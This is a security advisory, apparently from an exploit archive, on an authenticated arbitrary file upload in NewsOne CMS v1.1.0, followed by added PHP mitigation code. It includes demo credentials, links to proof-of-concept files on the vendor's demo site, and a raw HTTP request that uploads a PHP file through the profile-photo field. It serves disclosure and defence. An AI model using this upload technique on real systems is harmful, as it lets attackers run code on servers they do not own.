# Exploit Title: NewsOne CMS – News, Magazine & Blog Script v1.1.0 Arbitrary File Upload
# Google Dork: -
# Date: 18/01/2020
# Exploit Author: m0ze
# Vendor Homepage: http://www.newsone.dx.am/index/index
# Software Link: https://codecanyon.net/item/newsone-news-magazine-blog-script/25384256
# Version: 1.1.0
# Tested on: Kali Linux
# CVE: -
# CWE: 434
----[]- Info: -[]----
Demo website: http://www.newsone.dx.am/index/index
Demo account: member/member12345 (login/password)
PoC Upload #0: http://www.newsone.dx.am/Application/Content/uploads/profile/up-up.php
PoC Upload #1: http://www.newsone.dx.am/Application/Content/uploads/profile/index.html
PoC Upload #2: http://www.newsone.dx.am/Application/Content/uploads/profile/up.phtml
PoC Upload #3: http://www.newsone.dx.am/Application/Content/uploads/profile/poc.php?m0ze&email=_your_email_here_
----[]- Arbitrary File Upload -> User Profile: -[]----
Authenticate as a regular user (member/member12345, for example) and upload any file you want through the <input type="file" name="user_image"> field on the http://www.newsone.dx.am/auth/edit page.
PoC:
POST /auth/edit HTTP/1.1
Host: www.newsone.dx.am
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------18467633426500
Content-Length: 501
Origin: http://www.newsone.dx.am
Connection: close
Referer: http://www.newsone.dx.am/auth/edit
Cookie: _your_cookies_here_
Upgrade-Insecure-Requests: 1

-----------------------------18467633426500
Content-Disposition: form-data; name="member_id"

4
-----------------------------18467633426500
Content-Disposition: form-data; name="user_image"; filename="phpinfo.php"
Content-Type: application/octet-stream

<?php
phpinfo();
?>
-----------------------------18467633426500
Content-Disposition: form-data; name="edit_user_photo"

Update Profile Photo
-----------------------------18467633426500--
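
----[]- Mitigation sketch (added example): -[]----
The server-side check whose absence makes the request above succeed, written as an added example; it is not NewsOne's code and not part of the original advisory. The function name store_profile_image, the 2 MiB limit, the allowlist and the destination path are assumptions; only the user_image field name comes from the PoC.

```php
<?php
declare(strict_types=1);

// Added example, not NewsOne code. The function name, size limit and
// allowlist below are assumptions chosen for illustration.
const MAX_IMAGE_BYTES = 2 * 1024 * 1024;
const ALLOWED_IMAGE_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

// Validate one $_FILES entry and store it under a server-chosen name.
function store_profile_image(array $file, string $destDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_IMAGE_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Type is detected from the bytes; the client's Content-Type and filename are ignored.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $ext  = is_string($mime) ? (ALLOWED_IMAGE_TYPES[$mime] ?? null) : null;
    if ($ext === null || getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not an allowed image type');
    }
    // A file can be a valid image and still contain PHP, so the stored name
    // and extension come from the server, never from the request.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], rtrim($destDir, '/') . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

// Usage in the profile-edit handler (field name taken from the PoC request).
if (isset($_FILES['user_image'])) {
    try {
        $stored = store_profile_image($_FILES['user_image'], __DIR__ . '/uploads/profile');
    } catch (RuntimeException $e) {
        http_response_code(400);
        exit('Rejected: ' . $e->getMessage());
    }
}
```

With this check the phpinfo.php part in the PoC is rejected at the type test, and an accepted image is stored with a .jpg, .png or .gif extension only. The upload directory should additionally be served with script execution disabled.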